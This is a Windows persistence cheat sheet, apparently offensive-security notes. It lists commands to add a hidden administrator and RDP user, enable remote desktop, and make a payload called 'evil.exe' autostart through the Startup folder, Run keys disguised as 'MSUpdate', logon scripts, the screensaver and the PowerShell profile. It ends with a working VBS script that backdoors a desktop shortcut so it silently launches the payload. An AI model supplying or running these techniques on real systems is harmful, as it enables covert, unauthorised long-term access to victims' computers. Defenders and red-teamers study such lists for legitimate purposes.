Windows persistence cheatsheet
==============================

[[_TOC_]]

##### Add local user

    net user /add <username> <password>

##### Add local user to administrators group

    net localgroup Administrators <username> /add

##### Add local user to RDP group

    net localuser "Remote Desktop Users" <username> /add

##### Enable RDP and open firewall

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

##### Disable RDP and close firewall

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
    netsh advfirewall firewall set rule group="remote desktop" new enable=No

#### Persistence techniques
##### Startup folder

    copy C:\path\to\evil.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"

##### Registry run keys

    reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /t REG_SZ /d "C:\path\to\evil.exe" /f

##### Logon script

    reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /d "C:\path\to\evil.exe" /t REG_SZ /f

##### Screensaver

    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\path\to\evil.exe" /f
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "ScreenSaveTimeOut" /t REG_SZ /d "10" /f

##### Powershell profile

    dir %HOMEPATH%"\Documents\windowspowershell
    echo "C:\path\to\evil.exe" > %HOMEPATH%"\Documents\windowspowershell\profile.ps1

##### LNK backdooring with file to disk
VBS to backdoor a LNK on Desktop

    evil = "C:\path\to\evil.exe"
    placeholder = "C:\path\to\placeholder.vbs"
    shortcutName = "shortcut_name.lnk"

    set Wshell = WScript.CreateObject("WScript.Shell")
    strDesktop = Wshell.SpecialFolders("Desktop")
    set oShellLink = Wshell.CreateShortcut(strDesktop & "\" & shortcutName)
    originalTarget = oShellLink.TargetPath
    originalArgs = oShellLink.Arguments
    originalIcon = oShellLink.IconLocation
    originalDir = oShellLink.WorkingDirectory

    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set FH = FSO.CreateTextFile(placeholder,True)
    FH.Write "Set oShell = WScript.CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ")" & vbCrLf
    FH.Write "oShell.Run " & chr(34) & evil & chr(34) & vbCrLf
    FH.Write "oShell.Run " & chr(34) & oShellLink.TargetPath & " " & oShellLink.Arguments & chr(34) & vbCrLf
    FH.Close

    oShellLink.TargetPath = placeholder
    oShellLink.IconLocation = originalTarget & ", 0"
    oShellLink.WorkingDirectory = originalDir
    oShellLink.WindowStyle = 7
    oShellLink.Save

